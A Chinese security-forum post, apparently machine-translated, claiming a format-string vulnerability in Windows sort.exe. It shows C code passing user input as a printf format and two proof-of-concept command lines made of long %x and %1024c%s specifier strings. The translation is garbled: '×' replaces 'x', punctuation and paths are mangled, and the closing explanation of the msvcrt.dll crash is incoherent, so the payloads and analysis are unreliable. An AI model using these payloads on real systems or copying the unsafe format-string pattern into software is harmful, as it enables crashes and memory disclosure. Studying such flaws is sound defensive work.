K8安全团队
查看: 1632|回复: 0

Windows sort.exe利用DOS字符串格式

[复制链接]
  • TA的每日心情
    开心
    2017-6-13 17:07
  • 签到天数: 7 天

    [LV.3]偶尔看看II

    发表于 2018-9-18 01:47:00 | 显示全部楼层 |阅读模式

    马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。

    您需要 登录 才可以下载或查看,没有帐号?注册

    x
    理论上,它应该适用于所有Windows,但在8上进行了测试


    [AppleScript] 纯文本查看 复制代码
    #include <stdio.h>
    #include <stdlib.h>
    
    void F(char * a)
    {
    fprintf(stdout,a);
    }
    
    int main(int argc,char * argv [])
    {
         if(argc == 2)
          {
              // .....排序工作Blah Blah .....
               // ...如果错误{
                        F(argv [1]);
               // .............}
          }
    }


    漏洞利用1:
    [AppleScript] 纯文本查看 复制代码
    C:\\ Users \\ XXXXXXX \\ Desktop> sort。exe文件%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X %×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%× %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x %×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%× %×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%× %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x %×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%× %×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%× %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x %×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%× %×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%× %×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%× %×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%× %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x %x%x%x%x%x%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X %×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%× %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x %×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%× %×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%× %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x %×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%× %×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%× %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x %×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%× %×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%× %×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%× %×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%× %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x %x%x%x%x%x%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X %×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%× %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x %×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%× %×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%× %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x %×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%× %×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%× %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x %×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%× %×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%× %×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%× %×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%× %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x %x%x%x%x%x%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X %×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%× %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x %×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%× %×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%× %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x %×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%× %×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%× %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x %×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%× %×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%× %×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%× %×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%× %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x %x%x%x%x%x%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X %×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%× %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x %×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%× %×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%× %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x %×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%× %×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%× %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x %×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%× %×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%× %×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%× %×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%× %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x %x%x%x%x%x%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X %×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%× %×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%× %×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%× %×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%× %×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%× %×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%× %×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%×%X%× %x%x


    漏洞利用2:
    [AppleScript] 纯文本查看 复制代码
    C:\\ Users \\ XXXXXXX> sort.exe%1024c%s%1024c%s%s%s%s


    111.png

    222.png
    如果Msvcrt.dll中工作的通知创建MOV EAX,DWORD PTR DS:[ EDI- 4]

    而在ESI仍然是我们的INPUT


    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    Powered by Discuz! X3.2 © 2001-2016 Comsenz Inc.

    返回顶部